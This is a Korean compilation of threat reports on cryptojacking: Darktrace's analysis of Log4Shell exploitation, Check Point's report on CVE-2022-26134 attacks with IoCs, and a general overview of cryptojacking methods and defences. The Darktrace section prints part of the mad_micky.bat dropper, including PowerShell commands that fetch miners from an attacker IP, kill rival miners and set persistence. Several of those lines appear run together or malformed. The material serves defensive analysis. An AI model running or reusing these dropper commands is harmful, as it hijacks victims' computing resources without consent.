
Log4Shell(CVE-2021-44228) 취약점에 대한 교육적 분석으로, 암호화폐 채굴 캠페인에서의 악용을 상세히 설명하며 침해 지표(IoC), MITRE ATT&CK 매핑 및 탐지 지침을 포함합니다.
알리바바 클라우드 보안 팀은 여러 버전의 Apache Log4j2(Log4Shell)에 대해 인증되지 않은 원격 코드 실행을 가능하게 하는 치명적인 취약점 (CVE-2021-44228)을 공개적으로 공개했습니다. 공격자는 HTTPS와 같은 모든 프로토콜을 통해 연결하고 특수하게 조작된 문자열을 전송하여 취약한 서버를 악용할 수 있습니다.
Darktrace는 이 Log4j 취약점을 악용한 결과로 여러 고객 배포 환경에서 암호화폐 채굴 활동을 탐지했습니다. 이러한 각각의 사고에서 악용은 아웃바운드 SSL 연결을 통해 발생했으며, 이는 경계 방어를 우회하고 배치(.bat) 스크립트 파일과 암호화폐 채굴 악성코드를 설치하는 여러 실행 파일을 다운로드하기 위한 base64로 인코딩된 PowerShell 스크립트에 대한 요청으로 보입니다. 이 활동에는 일반적인 하드코딩된 IP, 실행 파일 및 스크립트를 포함한 광범위한 캠페인 지표가 있었습니다.
공격 주기는 Log4j 익스플로잇에 취약한 VMWare Horizons 서버를 찾기 위해 인터넷에 연결된 장치를 기회적으로 스캔하는 것으로 시작됩니다. 취약한 서버가 발견되면 공격자는 피해자에게 HTTP 및 SSL 연결을 수행합니다. 성공적인 악용 후, 서버는 포트 1389에서 콜백을 수행하여 mad_micky.bat이라는 스크립트를 검색합니다. 이를 통해 다음이 수행됩니다:
적어도 두 건의 사례에서 mad_micky.bat 스크립트는 사용자 에이전트가 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS)인 HTTP 연결을 통해 검색되었습니다. 이 사용자 에이전트가 이러한 네트워크에서 처음이자 마지막으로 관찰되었습니다. 이 사용자 에이전트는 일부 ASUS 장치에서 공장 초기화 설치 시 합법적으로 사용되는 것으로 보이나, 이 활동 중에만 관찰된 새로운 사용자 에이전트이므로 의심스럽습니다.
성공적인 악용 후, 서버는 포트 1389에서 콜백을 수행하여 스크립트 파일을 검색합니다. 이 예제에서 /xms.ps1은 호스트의 실행 정책을 우회하여 'mad_micky.bat'을 호출하는 base-64로 인코딩된 PowerShell 스크립트입니다:
그림 1: PowerShell 스크립트 xms.ps1에 대한 추가 정보
스냅샷은 영향을 받은 서버의 이벤트 로그를 자세히 보여주며, mad_micky.bat 파일 다운로드로 이어진 성공적인 Log4j RCE를 나타냅니다:
그림 2: mad_micky.bat 파일을 강조 표시한 로그 데이터
실행 파일과 스크립트를 검색하기 위해 추가 연결이 시작되었습니다. 스크립트에는 한국과 우크라이나에 위치한 두 개의 IP 주소가 포함되어 있었습니다. 우크라이나 IP로 연결이 이루어져 채굴기를 활성화하는 실행 파일 xm.exe를 다운로드했습니다. 채굴기는 XMRig Miner(이 경우)로, 여러 공개 위치에서 다운로드 가능한 오픈 소스 크로스 플랫폼 채굴 도구입니다. 다음으로 관찰된 exe 다운로드는 'wxm.exe'(f0cf1d3d9ed23166ff6c1f3deece19b4)였습니다.
그림 3: XMRig 실행 파일에 대한 추가 정보
한국 IP로의 연결에는 다른 스크립트(/2.ps1)와 실행 파일(LogBack.exe)에 대한 요청이 포함되었습니다. 이 스크립트는 SCM 이벤트 로그 필터 또는 PowerShell 이벤트 로그 소비자를 포함한 로깅 관련 실행 중인 작업을 삭제합니다. 또한 이 스크립트는 Pastebin에서 파일을 요청하며, 이는 Cobalt Strike 비콘 구성 파일일 가능성이 있습니다. 로그 삭제는 예약된 작업과 WMI를 통해 수행되었으며, 여기에는 Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer가 포함됩니다.
Pastebin에서 요청된 두 번째 파일은 더 이상 Pastebin에서 호스팅되지 않지만, schtasks 명령의 일부이므로 지속성을 설정하는 데 사용된 것으로 보입니다:
실행 파일 Logback.exe는 또 다른 XMRig 채굴 도구입니다. 동일한 한국 IP에서 config.json 파일도 다운로드되었습니다. 그 후 cmd.exe 및 wmic 명령을 사용하여 채굴기를 구성했습니다.
이러한 파일 다운로드 및 채굴기 구성 후 Pastebin에 대한 추가 연결이 이어졌습니다.
그림 4: mad_micky.bat 파일의 OSINT 상관 관계
set "STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
set "STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup"
looking for the following utilities: powershell, find, findstr, tasklist, sc
set "LOGFILE=%USERPROFILE%\mimu6\xmrig.log"
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing "%USERPROFILE%\mimu6" directory
timeout 5
rmdir /q /s "USERPROFILE%\mimu6" >NUL 2>NUL
IF EXIST "%USERPROFILE%\mimu6" GOTO REMOVE_DIR0echo [*] Downloading MoneroOcean advanced version of XMRig to "%USERPROFILE%\xmrig.zip"
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://141.85.161[.]18/xmrig.zip', ;%USERPROFILE%\xmrig.zip')"
echo copying to mimu directory
if errorlevel 1 (
echo ERROR: Can't download MoneroOcean advanced version of xmrig
goto MINER_BAD)echo [*] Unpacking "%USERPROFILE%\xmrig.zip" to "%USERPROFILE%\mimu6"
powershell -Command "Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\xmrig.zip', '%USERPROFILE%\mimu6')"
if errorlevel 1 (
echo [*] Downloading 7za.exe to "%USERPROFILE%za.exe"
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.Downloadfile('http://141.85.161[.]18/7za.txt', '%USERPROFILE%za.exe'"
powershell -Command "$out = cat '%USERPROFILE%\mimu6\config.json' | %%{$_ -replace '\"url\": *\".*\",', '\"url\": \"207.38.87[.]6:3333\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\mimu6\config.json'"
powershell -Command "$out = cat '%USERPROFILE%\mimu6\config.json' | %%{$_ -replace '\"user\": *\".*\",', '\"user\": \"%PASS%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\mimu6\config.json'"
powershell -Command "$out = cat '%USERPROFILE%\mimu6\config.json' | %%{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"%PASS%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\mimu6\config.json'"
powershell -Command "$out = cat '%USERPROFILE%\mimu6\config.json' | %%{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\mimu6\config.json'"
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command "$out = cat '%USERPROFILE%\mimu6\config.json' | %%{$_ -replace '\"log-file\": *null,', '\"log-file\": \"%LOGFILE2%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\mimu6\config.json'"
if %ADMIN% == 1 goto ADMIN_MINER_SETUP
if exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" (
set "STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
goto STARTUP_DIR_OK
)
if exist "%USERPROFILE%\Start Menu\Programs\Startup" (
set "STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup"
goto STARTUP_DIR_OK
)
echo [*] Downloading tools to make gado_miner service to "%USERPROFILE%\nssm.zip"
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('[http://141.85.161[.]18/nssm.zip', '%USERPROFILE%\nssm.zip')"
if errorlevel 1 (
echo ERROR: Can't download tools to make gado_miner service
exit /b 1Darktrace가 이 캠페인을 식별하는 데 사용한 주요 모델 위반 사항에는 비일반 포트의 애플리케이션 프로토콜, 서버에서 희귀 대상으로의 아웃바운드 연결 및 희귀 대상으로의 비콘닝과 같은 침해 중심 모델이 포함됩니다. 위장된 파일 전송, 희귀 위치에서의 여러 실행 파일 및 스크립트 및 희귀 외부 위치에서의 압축 콘텐츠와 같은 파일 중심 모델도 포함됩니다. 암호화폐 채굴은 암호화폐 채굴 활동 모델로 탐지됩니다.
희귀 및 새 사용자 에이전트로의 비정상적인 PowerShell과 관련된 모델은 Log4j 콜백 후 감염된 장치에서의 비정상적인 연결을 강조 표시합니다.
Darktrace의 자율 대응 기술인 Antigena를 사용하는 고객은 또한 수신된 파일 및 다운로드된 스크립트를 차단하고 감염된 장치를 정상적인 활동 패턴으로 제한하여 초기 악성 파일 다운로드와 지속적인 암호화폐 채굴 활동을 모두 방지하는 조치를 취했습니다.
5월 31일, 보안 회사 Volexity가 Atlassian에 모든 Confluence 서버 및 데이터 센터 지원 버전에 영향을 미치는 중요한 미패치 취약점을 보고했습니다.
Atlassian은 6월 2일 고객에게 이 중요한 취약점에 대해 경고하고 하루 후 패치를 발행했습니다. CISA는 6월 3일 이 취약점을 알려진 악용 취약점 목록에 추가했습니다.
Check Point는 이 취약점을 악용하는 공격을 방지하기 위한 전용 보호 기능을 출시했으며, 고객에게 영향을 받는 시스템에 패치를 적용할 것을 권고합니다.
취약점
Atlassian Confluence 및 Data Center의 취약점은 CVE-2022-26134로 지정되었으며, 인증되지 않은 OGNL(Object-Graph Navigation Language) 표현식 주입 공격으로 이어질 수 있습니다.
원격의 인증되지 않은 공격자는 이 취약점을 사용하여 URI에 악성 페이로드를 배치함으로써 대상 서버에서 임의 코드를 실행할 수 있습니다.

그림 1: CVE-2022-26134를 악용하는 악성 페이로드.
실제 환경에서의 악용
Check Point Research(CPR) 연구원들은 취약점이 공개된 이후 많은 수의 악용 시도를 발견했습니다. 처음에는 많은 잠재적 공격자가 취약한 대상을 식별하기 위해 스캐닝 방법을 사용했습니다. 며칠 후, 공격자들은 취약점을 사용하여 영향을 받는 시스템에 악성코드를 다운로드하기 시작했습니다.
악용 로그 중에서 연구원들은 동일한 캠페인과 관련되고 동일한 소스에서 시작되었지만 Linux 및 Windows라는 다른 플랫폼을 대상으로 하는 몇 가지 악성 페이로드를 발견했습니다.
감염 체인은 피해자의 운영 체제에 따라 다릅니다.
Linux OS 대상 공격
공격자는 Atlassian 0-day 취약점을 활용하여 피해자에게 조작된 HTTP 요청을 전송했습니다.

그림 2: base64로 인코딩된 페이로드로 CVE-2022-26134를 악용하는 조작된 HTTP 요청.
base64 문자열은 다른 base64로 인코딩된 문자열로 디코딩됩니다. 전반적으로 연구원들은 실제 페이로드를 얻기 위해 문자열을 여러 번 디코딩해야 했습니다.

그림 3: 디코딩된 base64 문자열.
이 스크립트는 원격 C&C 서버에서 xms라는 bash 스크립트 파일을 피해자의 tmp 폴더로 다운로드하고, 실행한 후 삭제합니다.

그림 4: 악성 xms 스크립트의 일부.
xms 파일은 드로퍼 스크립트입니다. 피해자 시스템에서 실행 중인 에이전트를 제거하고, 재부팅 시 지속성을 유지하기 위해 크론 작업에 자신을 추가합니다.
또한 a[.]oracleservice.top에 대한 네트워크 연결 테스트가 지속적으로 수행됩니다.
다른 시스템으로 확산하기 위해 스크립트는 SSH 키를 검색하고 연결을 시도합니다. 그런 다음 C&C 서버에서 xms 파일을 다운로드하여 실행합니다.
스크립트는 dbused라는 ELF 실행 파일을 여러 원격 IP의 tmp 폴더로 다운로드합니다.
dbused 파일은 정적 탐지를 피하기 위해 UPX로 패킹되어 있습니다.
ELF 파일은 피해자 시스템의 리소스를 소모하는 암호화폐 채굴기입니다.

그림 5: dbused 프로세스가 시스템 리소스를 소모합니다.
Windows OS 대상 공격
공격자는 Atlassian 취약점을 이용하여 원격 C&C 서버에서 파일리스 공격을 시작하기 위해 PowerShell 다운로드 크래들을 실행했습니다.

그림 6: PowerShell 명령을 사용하여 CVE-2022-26134를 악용하는 조작된 HTTP 요청.
lol.ps1 스크립트가 PowerShell 메모리 프로세스에 주입됩니다.
스크립트는 wmi를 사용하여 프로세서 아키텍처를 확인하여 요구 사항과 일치하는지 검증합니다.
그런 다음 checkit2라는 실행 파일을 tmp 폴더로 다운로드하고 숨김 모드로 실행합니다.

그림 7: lol.ps1 스크립트.
checkit2.exe 프로세스는 InstallUtil.exe라는 자식 프로세스를 생성하며, 이 프로세스는 C&C 서버에 연결됩니다. InstallUtil.exe는 다시 AddInProcess.exe라는 또 다른 자식 프로세스를 생성하는데, 이것이 암호화폐 채굴기입니다. 피해자 시스템에서 잠시 실행된 후, checkit2 프로세스는 스스로 종료됩니다.
![]()
그림 8: 시스템에서 실행 중인 checkit2.exe 프로세스.
![]()
그림 9: 시스템에서 실행 중인 InstallUtil.exe 프로세스.
악성코드는 새로운 이름으로 자신의 복사본을 시작 메뉴 폴더에 다운로드합니다.

그림 10: 시작 폴더에 다운로드된 cloud.exe 파일.
암호화폐 채굴기가 이제 시스템에서 실행되며 모든 시스템 리소스를 소모합니다.
![]()
그림 11: 암호화폐 지갑 정보.
공격 체인
두 공격 시나리오 모두 CVE-2022-26134 취약점을 악용하는 초기 조작된 HTTP 요청으로 시작됩니다. 공격자는 Java 실행 함수를 사용하여 명령을 실행하여 피해자 시스템에 악성 페이로드를 다운로드합니다.
그런 다음 악성 페이로드는 영향을 받는 OS에 따라 실행 파일을 다운로드합니다. 두 실행 파일 모두 암호화폐 채굴기를 실행하여 피해자의 리소스를 자신의 이익을 위해 사용합니다.
위협 행위자
a[.]oracleservice.top 도메인과 시스템에서 추출한 암호화폐 지갑은 '8220 갱'이라는 사이버 범죄 그룹과 관련이 있습니다.
Check Point 보호:
IPS:
Atlassian Confluence 원격 코드 실행 (CVE-2022-26134)
Anti-Bot:
Trojan.WIN32.XMRig
IOC:
198.251.86[.]46
51.79.175[.]139
167.114.114[.]169
146.59.198[.]38
51.255.171[.]23
a.oracleservice[.]top
d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e
2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0
4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9
4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0
Monero Wallet:
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
크립토재킹은 암호화폐를 채굴하기 위해 타인의 컴퓨팅 리소스를 무단으로 사용하는 것입니다. 해커는 탈취할 수 있는 모든 종류의 시스템(데스크톱, 서버, 클라우드 인프라 등)을 가로채서 불법적으로 암호화폐를 채굴하려고 합니다.
전달 메커니즘에 관계없이, 크립토재킹 코드는 일반적으로 의심하지 않는 피해자가 시스템을 정상적으로 사용하는 동안 조용히 백그라운드에서 작동합니다. 피해자가 알아차릴 수 있는 유일한 징후는 느린 성능, 실행 지연, 과열, 과도한 전력 소비 또는 비정상적으로 높은 클라우드 컴퓨팅 요금입니다.
코인 채굴은 암호화폐 세계에서 새로운 암호화폐를 유통에 내보내는 합법적인 프로세스입니다. 이 과정은 복잡한 계산 문제를 가장 먼저 해결한 채굴자에게 통화를 보상하는 방식으로 작동합니다. 그 문제는 암호화폐 블록체인에 추가되는 검증된 트랜잭션 블록을 완성합니다.
“채굴자는 본질적으로 감사자로서의 작업에 대해 보수를 받습니다. 그들은 비트코인 거래의 적법성을 검증하는 작업을 수행합니다.”라고 최근 Investopedia의 비트코인 채굴 작동 방식에 대한 설명에서 자세히 설명합니다. “채굴자의 주머니를 채우고 비트코인 생태계를 지원하는 것 외에도 채굴은 또 다른 중요한 목적을 수행합니다. 즉, 새로운 암호화폐를 유통에 내보내는 유일한 방법입니다.”
코인 채굴을 통해 암호화폐를 얻으려면 일반적으로 막대한 처리 능력과 에너지가 필요합니다. 또한 암호화폐 생태계는 시간이 지나고 더 많은 채굴 경쟁이 생길수록 채굴을 더 어렵게 만들고 보상을 줄이는 방식으로 설계되었습니다. 이로 인해 합법적인 암호화폐 코인 채굴은 비용이 계속 증가하는 매우 비용이 많이 드는 일이 됩니다.
공격 방법은 크립토재커의 창의성에 의해서만 제한되지만, 다음은 오늘날 사용되는 가장 일반적인 방법 중 일부입니다.
과거에는 크립토재킹이 주로 엔드포인트 악성코드에 의존했으며, 데스크톱과 노트북에 악성코드를 유포하는 또 다른 수익 창출 목적으로 존재했습니다. 전통적인 크립토재킹 악성코드는 파일리스 악성코드, 피싱 방식, 웹사이트 및 웹 앱에 포함된 악성 스크립트와 같은 일반적인 경로를 통해 전달됩니다.
크립토재킹 공격자가 리소스를 탈취하는 가장 기본적인 방법은 엔드포인트 사용자에게 합법적인 이메일처럼 보이게 보내 컴퓨터에 암호화폐 채굴 스크립트를 배치하는 코드를 실행하는 링크를 클릭하도록 유도하는 것입니다. 이는 백그라운드에서 실행되며 명령 및 제어(C2) 인프라를 통해 결과를 다시 보냅니다.
또 다른 방법은 웹사이트나 여러 웹사이트에 전달되는 광고에 스크립트를 주입하는 것입니다. 피해자가 웹사이트를 방문하거나 감염된 광고가 브라우저에 나타나면 스크립트가 자동으로 실행됩니다. 피해자 컴퓨터에는 코드가 저장되지 않습니다.
이러한 경로는 여전히 우려되는 부분이지만, 범죄자들은 이익을 확대하기 위해 크립토재킹 플레이북에 훨씬 더 정교한 기술을 추가했습니다. 아래에 이러한 진화하는 방법 중 일부를 설명합니다.
공격자는 서버, 네트워크 장치, 심지어 IoT 장치로 범위를 확장하여 크립토재킹의 수익성을 높이려고 합니다. 예를 들어 서버는 일반적인 데스크톱보다 일반적으로 더 높은 성능을 제공하기 때문에 특히 매력적인 대상입니다. 또한 2022년에는 Log4J와 같은 취약점을 포함한 공개 인터넷에 노출된 서버를 스캔하고, 이를 악용하여 해커 서버에 연결된 시스템에 암호화폐 채굴 소프트웨어를 조용히 로드하는 악성 행위자들의 주요 사냥터입니다. 공격자는 종종 처음에 손상된 시스템을 사용하여 크립토재킹을 다른 네트워크 장치로 측면 이동시킵니다.
“Log4J 취약점에서 비롯된 암호화폐 채굴 활동 증가를 목격하고 있습니다.”라고 LogRhythm의 선임 위협 연구 엔지니어 Sally Vincent는 말합니다. “해커들은 네트워크에 침투하여 스토리지를 사용하여 암호화폐를 채굴하는 악성코드를 설치하고 있습니다.”
사이버 범죄자들은 코드에 크립토재킹 스크립트가 포함된 악성 패키지 및 라이브러리로 오픈 소스 코드 저장소를 오염시켜 소프트웨어 공급망을 표적으로 삼고 있습니다. 개발자들이 전 세계에서 수백만 개의 이러한 패키지를 다운로드함에 따라, 이러한 공격은 두 가지 방식으로 범죄자들의 크립토재킹 인프라를 빠르게 확장할 수 있습니다. 악성 패키지는 개발자 시스템(및 이들이 연결된 네트워크 및 클라우드 리소스)을 직접적인 불법 암호화폐 채굴 리소스로 사용하도록 표적으로 삼을 수 있습니다. 또는 이러한 공격을 활용하여 개발자가 구축 중인 소프트웨어를 애플리케이션 최종 사용자의 시스템에서 암호화폐 채굴 스크립트를 실행하는 구성 요소로 오염시킬 수 있습니다.
많은 크립토재킹 기업들은 클라우드 인프라에 침투하여 더 넓은 컴퓨팅 풀을 활용하여 채굴 활동을 지원함으로써 클라우드 리소스의 확장성을 이용하고 있습니다. 지난 가을 Google의 사이버보안 행동 팀의 연구에 따르면 손상된 클라우드 인스턴스의 86%가 암호화폐 채굴에 사용됩니다.
“오늘날 공격자들은 클라우드 서비스를 통해 단일 로컬 시스템보다 더 큰 규모로 계산을 실행할 수 있기 때문에, 사용자의 관리형 클라우드 환경을 장악하거나 SaaS 애플리케이션을 남용하여 계산을 실행하는 등 어떤 수단을 써서라도 점점 더 많은 암호화폐를 채굴하기 위해 클라우드 서비스를 표적으로 삼고 있습니다.”라고 Palo Alto Networks의 수석 보안 연구원 Guy Arazi는 블로그 게시물에 썼습니다.
이를 수행하는 일반적인 방법 중 하나는 노출된 컨테이너 API 또는 보안되지 않은 클라우드 스토리지 버킷을 스캔하고 해당 액세스를 사용하여 영향을 받는 컨테이너 인스턴스 또는 클라우드 서버에 코인 채굴 소프트웨어를 로드하기 시작하는 것입니다. 공격은 일반적으로 공개 인터넷에 접근 가능하고 API가 노출되거나 인증되지 않은 액세스가 가능한 서버를 찾는 스캐닝 소프트웨어로 자동화됩니다. 공격자는 일반적으로 스크립트를 사용하여 초기 시스템에 채굴기 페이로드를 배치하고 연결된 클라우드 시스템 전체로 확산할 방법을 찾습니다.
“대규모 크립토재킹을 수행하는 수익성과 용이성으로 인해 이러한 유형의 공격은 쉬운 표적이 됩니다.”라고 Cado Security의 보안 연구원 Matt Muir는 클라우드 기반 공격이 특히 수익성이 높다고 설명하는 블로그 게시물에서 말했습니다. “사용자가 Docker 및 Redis와 같은 서비스를 신뢰할 수 없는 네트워크에 계속 노출하는 한 이는 계속될 가능성이 높습니다.”
ReasonLabs의 보고서에 따르면 지난 해에 탐지된 모든 트로이 목마 중 58.4%가 크립토재킹 코인 채굴기였습니다. 한편 SonicWall의 또 다른 연구에 따르면 2021년은 현재까지 크립토재킹 공격에 최악의 해였으며, 해당 범주에서 연간 9,710만 건의 공격이 기록되었습니다. 이러한 수치가 매우 높은 이유는 크립토재킹이 사실상 사이버 범죄자들에게 돈을 벌어주기 때문입니다.
범죄자가 피해자 시스템의 사실상 무제한적인 무료 컴퓨팅 리소스 풀에서 암호화폐를 채굴할 수 있다면, 그들에게 이익은 엄청납니다. 올 봄 비트코인 가치가 급락하여 30,000달러 아래로 떨어졌음에도 불구하고, 크립토재커의 불법 마진은 여전히 사업적 타당성을 유지합니다. 그들이 채굴하는 것의 가치가 범죄 인프라 비용을 훨씬 상회하기 때문입니다.
Cado Labs의 보안 연구팀의 허니팟이 노출된 Docker Engine API 엔드포인트와 Redis 서버를 표적으로 삼고 웜과 같은 방식으로 확산될 수 있는 다단계 크립토재킹 공격을 발견했습니다. 이 공격은 2021년 말과 2022년에 수많은 크립토재킹 캠페인으로 특히 활발했던 WatchDog 공격 그룹에 의해 수행됩니다.
TeamTNT는 크립토재킹 초점을 클라우드 지향 서비스로 크게 전환한 최초의 해킹 그룹 중 하나입니다. TrendMicro의 연구원들은 2021년 말에 이 그룹이 Kinsig 갱과 같은 경쟁 그룹과 함께 Alibaba ECS(Elastic Computing Service) 인스턴스에 채굴기를 설치하고 탐지를 피하기 위해 보안 기능을 비활성화하는 크립토재킹 캠페인을 수행했다고 보고했습니다.
Log4Shell 취약점은 2022년 크립토재킹 공격자에게 큰 도움이 되었습니다. 한 가지 두드러진 예로, Sophos 연구원들은 올해 초 '떼'를 이룬 공격자들이 VMware Horizon 서버를 표적으로 삼아 z0Miner, JavaX 채굴기 및 최소 두 가지 XMRig 변종(Jin 및 Mimu 암호화폐 채굴기 봇)을 포함한 다양한 크립토재킹 페이로드를 전달하는 것을 발견했습니다.
2021년 가을, Sonatype의 소프트웨어 공급망 보안 전문가들은 전 세계 개발자가 사용하는 JavaScript 패키지 저장소인 npm에 숨겨진 악성 암호화폐 채굴 패키지에 대해 경고했습니다. 당시 세 개의 패키지를 발견했는데, 그중 적어도 하나는 개발자들이 사용하는 인기 있는 합법적인 라이브러리인 'ua-parser-js'를 사칭하고 있었습니다. 이 라이브러리는 주간 다운로드 수가 700만 건이 넘으며, 개발자들을 속여 실수로 악성 코드를 다운로드하여 소프트웨어에 설치하도록 유도하는 이상적인 방법이 될 것입니다.
그 보고서가 나온 지 몇 달 후, 연구원 WhiteSource(현재 Mend)는 npm에 크립토재킹 및 기타 악의적인 행위를 포함하는 최대 1,300개의 악성 패키지가 넘쳐난다는 추가 보고서를 발표했습니다.
지난 여름, Bitdefender는 SSH 자격 증명을 사용하여 Linux 기반 시스템을 표적으로 삼아 Monero 채굴 악성코드를 배포하는 루마니아 위협 그룹을 발견했습니다. 이들이 사용한 도구는 서비스형(as-a-service) 모델로 배포되었습니다. 이 사례는 증가하는 추세로 보이는 Linux 시스템 암호화폐 채굴 공격의 첨단에 있었습니다. VMware의 올해 초 보고서는 Linux 기반 멀티 클라우드 환경, 특히 XMRig 채굴 소프트웨어를 사용한 표적 공격이 증가하고 있음을 자세히 설명했습니다.
"Linux 기반 시스템의 암호화폐 채굴 샘플 중 다수는 XMRig 애플리케이션과 어떤 관계가 있습니다."라고 보고서는 설명하며, 암호화폐 채굴 공격의 89%가 XMRig 관련 라이브러리를 사용한다고 밝혔습니다. "따라서 Linux 바이너리에서 XMRig 특정 라이브러리와 모듈이 식별되면, 이는 잠재적인 암호화폐 채굴 행위의 증거일 가능성이 높습니다."
CoinStop은 최근 아시아 클라우드 서비스 제공업체(CSP)를 표적으로 삼는 것으로 발견된 또 다른 크립토재킹 캠페인입니다. 이 캠페인은 포렌식 방어 및 회피 조치로 차별화되었습니다. 여기에는 시스템 타임스탬프를 조작하는 타임스탬핑(timestomping), 시스템 암호화 정책 제거, 역방향 셸 세션을 생성하기 위한 /dev/tcp 장치 파일 사용 등이 포함된다고 Cado의 Muir는 공격에 대한 보고서에서 설명했습니다.
크립토재커들은 때때로 기업 인프라에서 처리 능력뿐만 아니라 에너지와 네트워크 자원까지 탈취하기 위해 상당한 노력을 기울이기도 합니다. 작년에 Darktrace 분석가들은 자사 고객 중 한 명의 익명 사례를 강조하며, 평범해 보이는 판지 상자 안에 위장된 창고 내 암호화폐 채굴장을 발견했다고 밝혔습니다. 내부에는 회사 네트워크 전원에 연결된 여러 GPU를 실행하는 은밀한 채굴 장비가 있었습니다.
크립토재킹이 엔드포인트, 서버, 클라우드 리소스에 걸친 다중 벡터 공격으로 진화함에 따라, 이를 예방하려면 조율되고 균형 잡힌 방어 전략이 필요합니다. 다음 단계는 기업 리소스에서 크립토재킹이 만연하는 것을 방지하는 데 도움이 될 수 있습니다.
강력한 엔드포인트 보호 사용: 이의 기본은 크립토마이너를 탐지할 수 있는 엔드포인트 보호 및 안티멀웨어를 사용하고, 웹 필터를 최신 상태로 유지하며, 브라우저 기반 스크립트가 실행될 위험을 최소화하기 위해 브라우저 확장 프로그램을 관리하는 것입니다. 조직은 이상적으로 서버 이상으로 확장할 수 있는 엔드포인트 보호 플랫폼을 찾아야 합니다.
서버(및 기타 모든 것) 패치 및 강화. 크립토재커들은 조용히 수확할 수 있는 가장 쉬운 대상을 찾는 경향이 있습니다. 여기에는 오래된 취약점이 포함된 공개적으로 노출된 서버를 스캔하는 것도 포함됩니다. 패치 적용, 사용하지 않는 서비스 비활성화, 외부 노출 영역 제한을 포함한 기본적인 서버 강화는 서버 기반 공격의 위험을 최소화하는 데 큰 도움이 될 수 있습니다.
소프트웨어 구성 분석 사용. 소프트웨어 구성 분석(SCA) 도구는 코인 채굴 스크립트를 활용하는 공급망 공격을 방지하기 위해 소프트웨어 내에서 사용되는 구성 요소에 대한 더 나은 가시성을 제공합니다.
클라우드 구성 오류 추적. 조직이 클라우드에서 크립토재킹을 막을 수 있는 가장 영향력 있는 방법 중 하나는 클라우드 및 컨테이너 구성을 강화하는 것입니다. 이는 적절한 인증 없이 공개 인터넷에 노출된 클라우드 서비스를 찾고, 노출된 API 서버를 뿌리 뽑고, 개발자 환경에 저장되고 애플리케이션에 하드코딩된 자격 증명 및 기타 비밀을 제거하는 것을 의미합니다.
크립토재킹은 장기간 탐지를 피하기 위해 최소한의 흔적만 남기도록 설계된 전형적인 저속·저소음(low-and-slow) 사이버 공격입니다. 엔드포인트 보호 플랫폼과 엔드포인트 탐지 및 대응 기술이 크립토재킹 공격을 경고하는 데 큰 발전을 이루었지만, 공격자들은 이 분야에서 회피에 능숙하며 불법 코인 마이너 탐지는 특히 소수의 시스템만 손상되었을 때 여전히 어려울 수 있습니다. 다음은 크립토재킹 징후를 식별하기 위한 몇 가지 추가 방법입니다.
헬프데스크가 크립토마이닝 징후를 찾도록 교육하세요. 때때로 사용자 엔드포인트에서 첫 번째 징후는 느린 컴퓨터 성능에 대한 헬프데스크 불만 급증입니다. 이는 추가 조사를 위한 위험 신호가 되어야 하며, 모바일 기기의 과열 또는 배터리 성능 저하도 마찬가지입니다.
네트워크 모니터링 솔루션 배포. 네트워크 모니터링 도구는 출처가 어느 기기든 상관없이 크립토재킹 활동을 나타내는 웹 트래픽 및 아웃바운드 C2 트래픽을 포착하는 강력한 도구를 제공할 수 있습니다.
